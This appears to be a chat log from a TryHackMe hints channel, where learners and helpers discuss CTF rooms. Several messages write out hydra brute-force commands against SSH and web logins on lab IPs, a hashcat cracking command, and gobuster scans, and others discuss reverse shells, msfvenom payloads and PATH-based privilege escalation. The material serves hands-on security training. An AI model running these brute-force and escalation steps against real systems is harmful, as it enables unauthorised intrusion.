#room-hints

on it

hi, anyone for the foothold on "SET" room?

hey, need hint for the task 43 : https://tryhackme.com/room/zthlinux

idk if i need to gain root access or if it's something else bcs i don't learn how to do it with root access

what have you tried till now @alpine lantern

hmm, tried to go into /etc/shadow but i need Root access too, tried to change permissions on the file but need root permissions, someone tell me i need to use the find command but idk how it can help me if i can't open the txt

look at all the files owned by all user you'll find a file which you haven't used till now, you are currently logged in as user shiba4 and you don't have su permissions so find user which have those permission

i have shiba1 to shiba4 for perm

see man page of find to know more on how to use that command

check all users

he completed the find command room yesterday

ye ^^

x)

i saw a file got a shadow user

then you should know how to play with find command

ye sure 🙂

dig harder you'll find the answer

oh yeah w8 i'll try

ye

room: CC Pen Testing
last task: CTF
I found the hidden directory and the hint given in room tells me to enumerate the site with hidden directory with different extensions
I have tried html,txt,jpg,php with all 3 wordlists big,small,medium
I haven't got anything though any hint for it

Hello am stuck on the CherryBlossom room journal flag|| i have the png image already but when running the check_png.sh|| i find nothing pls what am i missing??

the note says when u find the script put your all input in quotes ,

any body know what does that mean i have the script

Crypto Funhouse room: task 2 question 4 ; please help me

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

https://tryhackme.com/room/owasptop10 I am really stuck here... can anyone help me?

like how do I get to the root directory

I can connect there through putty, but I don't have the password...

I don't know how to get it

oh maybe I know

oh no I don't

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

oh

well Task 6 Day 1

I sent the link

I tried all the commands to try it said

oh I found the file

the text one

You dont need a password to connect, this web server has a command injection vuln. You can get a shell by making it execute a command directly

yeah but I forgot some of the commands

Pentestmonkey reverse shell may be a good resource for this case then

any hints for root privesc on Wonderland

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

i am on hatter's ssh box and i have tried linpeas and searched a lot but not able to figure out any attacks for root privesc

Linpeas should find it

Though it's not a terribly well known feature

@ripe hedge not getting any clue on what to look for ... P.S. looked a lot

You don't need a clue what to look for

You just need to run some enum scripts

See what it picks up

Linpeas usually highlights interesting things

Run it on a standard Ubuntu install, compare and contrast

That helps as well

thanks i got it

i never gave any thought to that section of linpeas before 😅

Also i learned at each step in this box

That was the goal when I built it

Please don't show passwords like that

apologises

can someone please help me out with the room learn linux , task 43

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

• What room you are on: Learn linux
• At what stage are you stuck exactly? Task43. I cant authenticate to the nootnoot user

Then maybe you're typing the password wrong

im not man , like im trying 😫

I mean, if you're typing the password correctly and it's not letting you, then the password is wrong

But I bet you're typing it wrong

not really looking for a hint but recently i signed up for the complete beginner learning path. i completed the linux basics and linux challenge rooms and next up was tmux. in the tmux room it asked to run an nmap scan against the VM, but as i stated i’m a complete beginning and have never used nmap should i do the nmap room before the tmux room? thanks!

Room: Crack the hash
Hash:279412f945939ba78ce0758d3fd83daa
Format: MD4
Status...........: ExhaustedI think that means none of the words matched the hash.

could you give me a hint?

You don't necessarily have to if it tells you exactly what nmap command to run

nmap is fairly straightforward, but it doesn't hurt to be familiar with it as one of the first things to learn

ok thanks

i think i’ll do intro to python and nmap room then tmux

Sure, tmux is just a utility thing for multi-tasking

so nmap and tmux aren't very related at all

ok thanks that’s good to know

Room: Crack the hash
Hash:279412f945939ba78ce0758d3fd83daa
Format: MD4
Status...........: ExhaustedI think that means none of the words matched the hash.

could you give me a hint?
$ hashcat "279412f945939ba78ce0758d3fd83daa" /usr/share/wordlists/rockyou.txt -m 900

Or you're using the wrong mode

It might not be in rockyou

900 | MD4 | Raw Hash

let me try other wordlists

Why not try online crackers?

It's md4 without a salt

perfect for online rainbow tables

is it a lot faster?

I mean, it's literally just a lookup rather than manually testing each input word

So, yes. Massively.

why do I even bother learning hashcat then 😄

because online rainbow tables only work for unsalted hashes

And only works if the plaintext is in the wordlist they used to create the table (which tends to be bigger lists than rockyou, and they add to them when they want)

I'll have to look up unsalted hashes. you just made it clear that I know nothing about hashes 🙂

Salts are a thing you add to the plaintext before hashing it

So that 2 users with the same password wouldn't have the same hash

sha512crypt, bcrypt, a few more, use a salt by default

So you can't use online rainbow tables (or any rainbow tables) to crack them

is there a way to figure out if a hash is salted

let me read up on hashes

The salt is stored in the database

There's a room on this

https://tryhackme.com/room/hashingcrypto101

hi all i have few que related to owasp day 9 task 30 component with known vulnerability like i have completed the taks some how by following the instruction but what i did was quite unclear as i was doing that for the first time i also google a bit but didnt get the satisfied ans .

I don't actually see what your question is.

i am writing a min!😅

as que says there is web app with vuln. and i can found with help of google i did now it say after getting the script i have to put quotes in input i didnt get that so i run the scirpt without any changes it didnt work first few time becuz i was not sure with syntax in task 29 there was a example how to run the scrip :: python <scriptname><target ip><port_num>. but that didnt work it showed error then i tried few time without port no i suddenly i got the shell now after that i was not able to even change dir. i dont know i type cd .. or cd <location> but i didnt work but when i type the syntax given in que that gave mw some output the syntax was: wc -c <location> i didnt undertand how that work

Some shells don't let you change directory, or don't preserve the new directory

Sounds like you need to read the manual for wc

wc is use for count right

You need to do your own research

gotcha

before asking

also why did i not get shell while i run the cmd for the first time

because you did something wrong? IDK, you haven't provided screenshots or anywhere near enough information for anyone to answer that question

well i already done that part but i was couries how i did that that way i dont have any screen shot thought thx for time and advice

also the que say to give quotes to input in scripts any idea about that

Sometimes you need to, soemtimes you don't

I didn't need to

well the thing was if i need to add the quotes where should i add that

around commands, like it tells you

i have a screent shot of script can i share here?

It's not actually relevant to share

You don't do anything to the script

It says all of your input in quotes

yes input means what it try to refer i didnt get that like we can not add to the input whice call the value we can only qoute which we want to print right so i got confused

Whatever you just said, it's incredibly unclear

sorry for that😅

Hi

Im rn in the last task of x86 64

And in the hint it says to reveese the password

I was just wondering where u could find that part while analysing the binary

"Reversing" is just a function/set of instructions designed to repeat until finished

Find out where the "processing" is done, the keyword is "loops"

The doubt i have is related to spoilers

Can i pm you?

I got the answer but i got it through hints

Hello, i need help in the Linux walk through room, task 18 question 2, it says what is the value of the home environment variable I tried doing echo $home but it doesnt return anything. What could be the problem? Thanks

Variables are case sensitive

oh, thanks man

Hi guys. I am sitting here in the https://tryhackme.com/room/linuxctf and trying to find Flag 15. (Can you find information about the system, such as the kernel version etc.) - Unfortunatelly i still cannot find this info after 30 minutes of research. I tried hostnamectl values, did not work. uname with all parameters etc. I also checked the /procs/ directory. Not no chance. Thank you for any tipps

The hint tells you where to look

something with ||*release|| But i cannot find it. I checked all files with ||release|| in the name and did a system wide search.

I don't believe you

Otherwise you would have found it

mmh ok. then i need to look closer. damn it 🙂

but i will do this tomorrow. time to go to bed now.

beaunas noches!

hello guys, I need help in the linux walkthrough room, task 33, I dont know how to find the shiba4 binary, i did this find / shiba4 and find / shiba4.bin but they didnt work. what could be the problem? thanks

I recommend going back and learning how find works

ok, thanks

You should be doing that when you get stuck already

And consulting google

yeah but it seemed to be working

You're missing something essential in your command.

Clearly it wasn't working

yeah

Vulnversity room Task 3 #2, I think i'm approacing with a wrong method by blindly choosing a random file for goBuster. I would like to get a hint on what im doing

How about using a directory wordlist?

@stuck fractal the command only works with file but not with directory

Wat

A directory wordlist. A wordlist of web directories

||gobuster dir -u http://<IP>:3333 -w /usr/share/wordlists/<file of choice> ||

Hello guys. Anyone guve ma a hint on django room. Last task. I managed to find the hidden flag but I'm really struggling to get the user and panel admin

Yep, that's correct @nimble swift

@stuck fractal but my problem is don't think the file I suppose to use is in there

Are you on Kali?

You need to go deeper into gobuster wordlists directory and then choose a file

@stuck fractal yup

Or dirsearch wordlists. Or any of those wordlists directories

@nimble swift Then there are a lot of directory searching wordlists in /usr/share/wordlists

They're organised into dirs within that dir

@oblique cliff look like I have to look into each file, right?

No

Just try a directory bruteforcing wordlist

I leave you in James’s more than capable hands

@stuck fractal sorry cannot see bruteforcing wordlist in /wordlists

No, you can't. Because it's not called that.

Have you tried researching the names of the files and folders you find there?

Find out what their purposes are

I see, I am going to have a look into these directories first

The names of the directories probably mean more than the names of the files inside them

@stuck fractal I found the directory that contain lists of directories ||dirbuster|| but it incorrect

What is incorrect?

Room, task, question, what are you doing?

Room: Vulnversity, Task3 #2.

My question is about the file I chosen for gobuster is not the right one

It doesn't ask you for that file

You need to use gobuster

I am using the given command for gobuster but I have to give it a file

Yes

What is the problem?

What's telling you that the file is not the right file?

no result from files I used

What files did you use?

||fasttrack.txt||

That's a password list

As is rockyou

atm im running ||"rockyou.txt"|| but it will take a few hour

Rockyou is a password wordlist

Stop

You do not use rockyou for directories

inside "dirbuster" there are many files for directories

Yep

and dirb/ too

yup

They are all directory wordlists

try some out

Start with the small ones

😦

dirb has small ones

sound like a good plan 😛

thanks

@stuck fractal This is very cool, after I got my results from gobuster I use them on firefox to check for "upload form page"

What can we load into Comparer to see differences in what various user roles can access? This is very useful to check for access control issues Can Anyone help me in this question?

hi I m doing some basic room just as morning warmup, i m stuck on question about nmap. I can't find correct answer (I mean I know the correct parameter but it said I m wrong) may be because my english is not good enough. Any one to give a push?

Maybe you can mention what question is that and what do you think the answer is

@final mortar the question is "how do you do a "ping scan" . to me it is -sP but it say no

Its not that. Look at the manual again.

@ashen matrix thank you got it.

I really needs help with this one i CC Pen testing, Nikto . I have been looking through many manuals and keeps returning back to -mutate+3 which is not the right answer.

It's only looking for the name of the plugin not the command

https://github.com/sullo/nikto/wiki/Plugin-list

On here it will state Plugin: Plugin_Name

Ok thanks 🙂 L'll try to see if I can find the name of the plugin

Task 2``````#3 
Hash:$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.

Salt: aReallyHardSalt
Rounds: 5```
I used online hash analyzer for previous levels. I don't know how to go with this. I tried analyzing the hash without the salt and it is unknown either way.

Online hash analysers can't crack hashes which contain salt

You need to use hashcat for it

I just want to know what hash algorithm is used so that I can set mode for hashcat

Google it

Google on how hash structure is classified

You'll find out how to identify hash type

thanks

Hashcat has a website for example hashes

Google on how hash structure is classified
Hey @trim haven this search query won't give the answer

Keyword examples

I know how I found out that answer but what will be general search query for it

I completed the exact room by looking at examples and seeing which ones matched the current hash

For some reason I just googled what is ||$6$|| hash type 😅

And then somewhere I got the structure of the hash

Hi, please give me hint about room 'Recovery', i am in the start

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

I'm in the basic pentesting room and running: hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.136.178 -t 4 ssh
but it takes forever.

I get 44 tries in 1 min

-t 4 might take a while with rockyou

You can safely use 16 threads on that room

You can probably get away with more but it might also break the server

Im running it on the browser based kali machine. I can just find the info 3Ghz intel. But how many threads does it have?

As many as you want? As for cores that's a good question

sorry I mean cores.

Doesn't really matter for threads

Im running it on the browser based kali machine. I can just find the info 3Ghz intel. But how many threads does it have?
@alpine remnant Doesn't matter

Threads !=processes

Can I has nudge on Wonderland from Alice :(

looked very carefully through all the enumeration scripts and did manual enumeration but I haven't been able to find anything I can take advantage of

||the python file that we can run as hatter is uneditable and I can't delete it and write over it, and then the 2 things with capabilities set only can be run by hatter, which I am not||

The python file isn't editable but it does something interesting

blargh ok i guess i just skimmed what it does, ill look closer

Wait

Who are you before I give false info

Okay, got it. I was just a little confused if -t is refering to the physical core count or threads.

people call me Bob

but i am jared

On the server, silly

Can I has nudge on Wonderland from Alice :(
@oblique cliff

i know xD I'm alice

Right ok

Info stands

cool, thanks

There's also another part to that puzzle

oh nos

You should have found it while enumerating, otherwise enumerate harder

There's also another part to that puzzle
@ripe hedge Really?

i mean i found a lot of stuffs, but im not sure to which stuffs youre referring

Let me check my notes it's been a while

i mean i found a lot of stuffs, but im not sure to which stuffs youre referring
@oblique cliff sudo -l

Yeah that

Was assuming that was too big a hint though

I mean it's generic advice on any box

Especially where you have a password

unless theres some way to pipe an extra command into that sudo entry (which I don't know how to do if so), or something in the secure path that i dont know about either I don't really see how that helps

||all the file does is choose 10 random entries from the list, running it as rabbit doesnt make a difference that i can see||

type into google

python privilege escalation

It's research time

https://giphy.com/gifs/star-wars-181OUQHOCfde0

wooooooooooooooooow

very very very cool @stuck fractal

Hello, i am having issues with find agent name in task 2 #3 room agent sudo

*finding

Hello, i am having issues with find agent name in task 2 #3 room agent sudo
@hushed elbow tell me any agent name you found ?

haven't found a way to find it, but i used the hint to change the UA to chrome

who told you to change UA, exactly ?

from the hint section, i was told to change it

So

Maybe google chrome change user agent?

hint is correct but you got it wrong, ||playing with words|| , you tried openning webpage ?

plus take @stuck fractal advise. combine hint you shared with the msg with the one on webpage (msg by another agent).

Thanks, was able to get it

I haven’t tried anything else so I’m not looking for a hint, but just out curiosity @stuck fractal why ||if that tea party binary is setting its id to hatter, when I overflow the input why do my commands still execute as rabbit||?

Lmao

Don’t laugh at me 😭

You can't overflow it

Do some RE on it

I did

You can't overflow it

you should know that from the RE

I thought I could overflow the char function, guess not

It gets a single character

And discards it

Oh

Huh ok

The teaparty binary was pretty fun 😀

@regal oriole Wrong channel

Sorry

So not a rabbit hole, noted when I boot back up

hi i have issue in linux room task 11

any hints on Recovery

hi i have in linux room task 11
@tribal surge Please give more detail if you'd like help or a hint

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

hi i have issue in linux room task 11
@tribal surge screenshot of that task will be helpful, maybe with some context

And some basic details of your issue

Seeing as we can't help if we don't know what's wrong

The teaparty binary was pretty fun 😀
@tidal sedge I overestimated it so much and then realized how simple the concept was

That was the goal

Aaaaaand I stop reading now

my question is where should i create the file

In the directory you’re in currently

Hmm, I remember RE'ing it when the box dropped, fun times, once you know what to do on wonderland it's pretty simple, but still fun

I mean I would argue most boxes are pretty simple after you’ve completed it

Hi, please give me hint about room 'Recovery', i am first flag

At the start is vague

I've tried all my knowlege, the start means first flag

I've tried all my knowlege well that really tells us nothing

)

What exactly have you tried?

You should ask your exact problem tbh

Ssh brute, gobuster, port knocking, searching for exploit To Apache,

They give you ssh creds

Yeah

What are you bruteforcing?

There are other port with ssh and a other user

What other user? And how do you know the other user

By the description

Have you tried ssh with given creds?

the theme of the room is reversing the damage that the malware has done

so start by trying to see what the malware did

I can't explain that is not normal CTF

Wut

didnt understand what you said there

You can't just throw anything there, you gotta understand whats happening

Nudge for ||teaparty|| in wonderland? I ||REd|| it but i cant see anything thats exploitable

Look at it a bit closer

See what it's doing

What can you manipulate?

||the date...?||

Try it and see™️

i cannt change ||date|| without sudo privs 😦

yes yes ill research more

i cannt change ||date|| without sudo privs 😦
@oblique cliff Go do kenobi

NOOOOOOOOOOOOOOOOOOOOOOOOOOOOO

noooooooooooooooooooooooooooooooooooooooooooooooooooooo

thank you 😭 so sad

Or commonlinuxprivesc

yes yes i understand already

the nooooooo was cuz i cant believe i didnt notice that

does powershell run with the same permissions as CMD right, they are based both on the user perms?

(I googled and didnt find anything conclusive btw, just confirming)

@white salmon

yes

I assume its intended that I dont end up in ||hatter|| group when i exploit ||teaparty||?

or did i fork that part up

I assume its intended that I dont end up in ||hatter|| group when i exploit ||teaparty||?
@oblique cliff ||you get given the password so you can use su or ssh||

aw man, again think harder jared!!

thanks buddy

hello quick question; first day using site and im doing the research room right now and im just stuck on the last question about "If a password hash starts with $6$, what format is it (Unix variant)?" im missing something cause I found out that its something called Bcrypt and it uses SHa-512 hash but thats not the answer its looking for so im a bit lost now

its looking for something a bit more specfic than that, but youre on the right path

or rather, you're right, you just need to get the naming convention right @hidden flax

to make my response clearer

ahhh dang

you're close but that's not quite the answer

haha

i’m in the common privesc room and i’m supposed to use msfvenom to make a payload for a cron exploit. when i try to run the code it says msfvenom command not found

did you try googling the exact question?

type it in again on google and see if you can find it

@hollow widget are you calling that command on your attacker machine or target

@hollow widget Run msfvenom on your host machine

ok

thanks

@hidden flax It's also not bcrypt

Bcrypt starts $2$

@stuck fractal well, you have successfully driven me bonkers with this room, so good job. Fun now that its done

The sequel is worse

yea, ill do that one next decade

It'll be out pretty soon

and ill laugh as people come in here asking questions that i cant answer

why did nmap break

why does it say my nmap scan will take 8 weeks

oh no, thats so evil

6 weeks is my max waiting time when scanning

🤣

@stuck fractal I assume that's the ports one?

I take the 5th

🙂

ah im still not able to find it ; the hint says __cry all im seeing is how AES uses it and that it was created by NSA in 01 any other hints as far as what i can search ?

wat

I don't think those are correct

i know i cant find anything about what SHA-512 is aside from it being from sha-2

im just lost

ill figure it out eventually

i know i cant find anything about what SHA-512 is aside from it being from sha-2
@hidden flax It's not sha512 though

Sha512 doesn't include a salt and doesn't have a prefix

it's related

okay so thats not even in the right direction then ? ill move past it

It's related to sha512

But sha512 doesn't have a prefix

And doesn't include a salt

Hey guys, when I try gobuster it says unable to connect, to <ip> request canceled while waiting for connection

first time i did it it did work tho

Bad VPN

I need help with agent sudo room

I got into ftp server
and there is this file telling me
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you. There are 2 image files, I dumped both of the files and couldn't find anything

Stegggggg

root:~/agent-sudo# strings cutie.png | grep steg```

I think I am lost

Steg

Strings isn't really steg

Try some steganography tools

here: https://0xrick.github.io/lists/stego/

thank you guys

@stuck fractal how do I fix the bad vpn? I tried reconnecting etc

sorry i'm new to all this

#site-support follow the VPN troubleshooting script

Thankyou

Any tips on vulnversity: compromise the webserver excercise 1? Whenever I try to upload something it says extension is not allowed, but it's the wrong answer

There's a specific kind of extension allowed- it's specifically one that enables you to use a reverse shell

see if you can find out which extension is useful for reverse shells

is there like a tool for it?

Sorry I'm really new to all this

is there like a tool for it?
@humble badger Yes, it walks you through that

^

But if you're really curious, https://www.acunetix.com/blog/web-security-zone/what-is-reverse-shell/

idk if this will answer your question necessarily, but it might point you in the right direction

Thanks guys 🙂

Have people used this exploit https://www.exploit-db.com/exploits/39161 in the "steel mountain room" ? After correcting some python errors and executing it the exploit gets blocked in the first request, without even making a request to the local web server... result:"curl: (28) Failed to connect to 10.10.169.149 port 8080: Connection timed out"

ps: the exploit is mentioned in task 4

Sounds like VPN issues

Or the wrong port

the ip's and ports are all right

I also tested my web server and worked, weird

nevermind, redeployed and it works.

hello, I need help in the linux walkthrough room, the last task (43) and basically, it asks us to find the flag in the file /root/root.txt, i have tried nano, cat, chmod, chown, grep, i have tried switching users, i tried viewing the password for shiba3, but it is the only one that has permission denied. What could I be doing wrong? Thanks

You'll have to find somebody who does have access to /root/root.txt

Are you sure you've checked every user?

no

i will check know

now

I tried it with shiba1, shiba2, shiba4 and noot. However I cannot find the passwords to shiba3 or nootnoot

Maybe those are the clues then :)

yeah

Don't just give up because you can't take the most direct path to root

will i have to login to another account to get to root or no?

anyone that can DM me for help on recovery? i got first 2 flags ..... had some questions.

That's what you'll have to find out

okay

hey man, i still didnt figure it out. I navigated basically everywhere in the computer trying to find clues, but i cant find anything

Check the files owned by each user, one should stand out @terse kiln

@oblique cliff Ok, thanks

@oblique cliff I checked the files owned by each user by doing find / -user USERNAME. but i didnt find anything, there were too many files and it was hard to find an important one

Did you filter out the errors

no

Google how to throw the errors into the abyss

ok, thanks

And that’ll narrow it down greatly

Linux find command filter out errors

@graceful sun I’m working through it, still missing a couple but I’m happy to help if I can.

room haskell, getting myhusk: Network.Socket.connect: <socket: 3>: does not exist (Connection refused) on reverse shell, any idea ?

task 22 day 17 ```
first question, In hint it is given that password should be cracked within 30 passwords in rockyou.txt. I have tried to login using molly, Molly, mOlly and few more but I'm not getting the password am I doing something wrong?

Hey in break the cage room || deoided dad_tasks to base 64 but can't decode|| it further stuck there also found this || audio file .MP3 that I think has something hidden || but can't find any tools to extract msg from ||.MP3 file||

https://tryhackme.com/room/ccstego check this room for finding that tool

I don't think though that you can extract the data from .mp3 file using the tool given in this room

google on it

Yea even I couldn't find much on mp3 file there was info on .wav files only mostly...

Thanks though :)

task 22 day 17 ```
first question, In hint it is given that password should be cracked within 30 passwords in rockyou.txt. I have tried to login using molly, Molly, mOlly and few more but I'm not getting the password am I doing something wrong?

?? any hint for this

Haven't done that yet...

Looks like there must be other usernames that you should try

Just guessing...

yeah I'll look into that

@arctic crystal if you don’t get anywhere you should move to #room-help and post a screenshot of the command you are trying there.

I haven't checked writeups yet, So I didn't move to #room-help

My guess is that you don’t have your hydra syntax 100% correct.

Just looking at the room can you send ss of your command

Hydra one

this is what I used ||hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.149.211 http-post-form "/login:username=^USER^&password=^PASS^&Login=Login:Your username or password is incorrect."||

The page is just /login?

Shouldn't be .PHP or some extension...

Rest looks fine according to me...

just login

Try typing just incorrect

In the failure part

ok

still not working

Read the write up

ya I was going to that now

It will work eventually.

WTF that hint is totally misleading

it worked for me in less than a second

The syntax seems fine haven't done that part though...

you mean ssh password or web-server password

it worked for me in less than a second
@mossy obsidian

web-server

though the ssh was only a few seconds

can you share what you used exactly

Maybe issue with your VPN...

Try re deploying the machine...

Maybe issue with your VPN...
@eternal brook No I checked the writeup, The hint given in room is there to troll us

@native kelp I’m sure he appreciates it, but it would be better in #522158404614225920

everything is right but password gets cracked at around 900k+

You've got i

everything is right but password gets cracked at around 900k+
@arctic crystal you've got it now?

I swear to god, i did that room too

ya I got but still can you share what you used because even writeups say that it would take too long to crack the password how you got it in seconds?
@mossy obsidian

MY PC went brrr

The hint was " not to use hints again ever"😂

Don't do that lol. Keep that password like in first 200 words of rockyou

The hint was " not to use hints again ever"😂
@eternal brook Seriously dude

mine was ex

ya I got but still can you share what you used because even writeups say that it would take too long to crack the password how you got it in seconds?
@mossy obsidian
@arctic crystal Mine was exactly the same as yours except using an environment variable for the IP. Have you performed a sort on the rockyou.txt file in the past?

Don't do that lol. Keep that password like in first 200 words of rockyou
@native kelp Ya that's a good idea

No

strange, the only reason I can think of that you didn't hit it quicker is that your wordlist is in a different order

ya that's how dictionary attacks work😕

Hey in break the cage room || deoided dad_tasks to base 64 but can't decode|| it further stuck there also found this || audio file .MP3 that I think has something hidden || but can't find any tools to extract msg from ||.MP3 file||
@eternal brook anyone?

Hint: spectrograph

Ok thanks:)

Is there some problem with the reverse shell I get as cage in break th cage room?

Sometimes it's sometimes it just hangs I've already rebooted the machine twice...

Hmm

I’m not aware of any issues like that

But as you’re unsubscribed it’s highly likely that that’s just the machine being slow, have you tried running the VPN script to see if it’s your VPN?

!vpnscript

Yea maybe subscription issue cause k get my shell back and then it dies or works for sometime then it dies...

I’m not sure about it constantly dying

I’d didn’t have that issue when I wasn’t subscribed and did the room

I'll redeploy then probably again ...

Hey i wanted a hint for the recovery room ... Im at the last flag bit im not able to get the flag.... Any one who can help???

Specify "the last bit" please

@trim haven @eternal brook I didn’t have any issues with that room and haven’t seen anyone else with any issues

Mhm which is why it is strange

I'm 90% sure that shells dying is multivpn but don't quote me

@trim haven i have decripted the files Using the key and uploaded back to the machine but i haven't received any flag after that...

Guys my Hydra is very slow, to crack password i need to go through 905678 passwords and on the hint in the room it says that if only should take about 30 seconds, but in 30 seconds my Hydra checks only around 3000 passwords and to check all of 905678 I need a lot of time (I know that password is on the 905678 position because I checked answers to that room. I am using VMware workstation with Kali on it and my Hydra is very slow is it supposed to be that slow? and how to boost it up?

I believe there are flags

But honestly if your computer is already slow I wouldn't want to push it too far

Guys my Hydra is very slow, to crack password i need to go through 905678 passwords and on the hint in the room it says that if only should take about 30 seconds, but in 30 seconds my Hydra checks only around 3000 passwords and to check all of 905678 I need a lot of time (I know that password is on the 905678 position because I checked answers to that room. I am using VMware workstation with Kali on it and my Hydra is very slow is it supposed to be that slow? and how to boost it up?
@livid elk which room?

Give it 10 minutes max, if not then we will have to help you further

Advent of Cyber Task 22 Day 17

Give it 10 minutes max, if not then we will have to help you further
@trim haven thanks

But you can use sed to specify which part of rockyou you want to start from

that's a troll don't believe that hint

I was stuck today for 4 hrs

Let me check with Muir to seconds

Ow i didn't even thought that they can troll in hints

password gets cracked at around 900k+ attempt

Ok thanks

Ow i didn't even thought that they can troll in hints
@livid elk we don’t. That was put very poorly

you can check writeups for that password or you can wait till it reaches 900k

@livid elk What are you trying to brute force exactly?

Bee and Muir said the room is broken and you will have to brute force ssh.

there are two questions for that task one is to brute force web-server password and other one is to brute force ssh password

ssh gets cracked within seconds

but web-server passwords takes a lonnnnng time

also when I discussed this here few hours back one of the user cracked the password but his password was different than mine and he was able to login using that password while I wasn't able to login using that same password

Ok guys next question: do you know like how to like check if the login u are using to bruteforce ssh or web server is valid or not?

depends on the software

some websites/services react differently to invalid passwords and invalid usernames

some ssh versions took more time to respond when the username was valid and you could check it that way

so there is no some program to check for valid logins for ssh or web server?

for some ssh versions there are scripts on exploitdb but websites are determined on a case by case basis

Ok thanks mate

@trim haven @eternal brook I didn’t have any issues with that room and haven’t seen anyone else with any issues
@oblique cliff don't know why my VPN is fine still I re downloaded it redeployed the machine but my shell just keeps on dying (I'm talking about the reverse shell as cage )... I'll try again tomorrow...

Might be setting the wrong payload or something, not sure

Can anybody tell what is the name of address type reserved for router?

Do not ask in multiple channels. You got answered in the other 2 channels

@oblique cliff sorry

ultratech: i am bruteforcing auth api with 3 users, m i on correct way ?

room: Pentest questionnaire
hey guys any hint for this question

nvm I got it

you're missing the hyphen

haha

Okay remove the answer pls

<3

done👍

ultratech foothold ?

ok @stuck fractal can u give me a hint in here?

No.

sorry for mention

ok anyway i have problem with admin authid in advent-of-cyber task 23 i dont know how to get admin cookie value

just ask for everybody and someone may answer you

@lucid crescent Read the task. Read the supporting material. Learn how it works. That's my hint.

task 2 Q2```
webpage says change: `Use your own codename as user-agent to access the site.`  I'm not getting what I'm supposed to do
any hint?

@arctic crystal Do you know what a useragent is?

the browser which access the web page?

No.

User-Agent also look for write ups @arctic crystal

This is the hints channel

LOL

You do not suggest writeups here.

I would have gone to #room-help

i said it like u @stuck fractal

if I would I checked writeups

So I recommend looking into what a user agent string is, and how you can set it

ok thx

also another hint use ||burp|| @arctic crystal

I mean, you don't have to

Probably even better if you don't

ok I have added new preference name and added the user agent

but still what is my codename like for Agent sudo will it be ||Agent S||

the message isnt for you

you need to guess the agent name that the message was intended for

ok

||another hint the User-Agent is one character|| @arctic crystal

Am I supposed to try all alphabets except R and S coz they are not working?

i mean there are only 26 letters in the english alphabet

wouldnt be too much to brute force it

ya but am I supposed to do that or am I missing something

like is that the intended way of doing it

try it and find out

if it works, it was intended, if it doesnt, it wasnt

well got it Thanks a lot

ok now I have extracted data from image and I have got one zip file and few other files I used zip2john on zip file and I got some hashed password but I'm not understanding exactly where it starts from

Where the hash starts from ?

Hello. I'm doing Wonderland. Need small hint with privesc ||from hatter to root. I've found that I can control date binary via PATH variable, but can't spawn shell as root. Only as hatter. So as there is already "S" bit set, I thought I can just run "/bin/sudo ./teaParty". No luck. But I've found that teaPartry changes uid and guid at the start of the file. There is no way to change user's id or edit teaParty file. I have hatter's password, but he is not in the sudoers file. I think I don't understand something about "s" bit. Any hint, @stuck fractal ?||

@lean vector Please don't just tag me when you want a hint.

Enumerate harder

If you had sudo permissions, you would know.

Okay, there is no way ||to exploit CVE-2016-1238||

Enumerate.

Question on the intro to python Room: for decrypting the flag. I am reading the encoded flag into a variable then passing to functions to go through a loop five times first for base64.b64decode() then .b32decode and finally .b16decode. however all I get when I try to print out the decode string is b". I am taking it, it is not as simple running through a loop 5 times for each decode?

Outermost layer is base16

I'm doing HackPark right now, and I'm trying to brute force the log in with Hydra, but I get 16 passwords all of which say are valid, none of which work

That means your command is not correct

I personally recommend using OWASP zap as it's much better than Hydra for this

The correct command for hydra is quite complicated as you need the full body of the request as you captured it

I feel like my command is correct || hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.16.214 http-post-form "/Account/login.aspx:
__VIEWSTATE=4l%2FANhI6xhT2FagRv0tZtxmMNoR7auDmgGgiaxCqZDiv3khduBWG%2B0J1ETngEwkGtsks%2FOfCvo7w8R%2B1fDvqr9A2MC20%2FtnG9JbAUK91bDwpjXPkQ7qI96zGa22XPNLoU0uwNUWhSdELw6zJ5H84W0lTSPnbrpz3qdCGyO3vM0cBVbi3&__EVENTVALIDATION=Ds5wO5zCeTLNY0f3OCLlLsr0f9dbGxz6weYQJwVxY4dP9Yply4Oy7h9uDbjCWzvujXrygH2VodxbhNBABSjJSPOn%2F6FoMWwIHnAna7WKBp0daMvTaGnh2M5yPh7FbFK%2FauYcusEQqqgiC0Qkv54iyWPCHtLokEaQUHWUW%2BGGHFyAYhO3&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"||

But I'll give zap a try

Thanks NinjaJc01 once I revesed the order worked perfectly

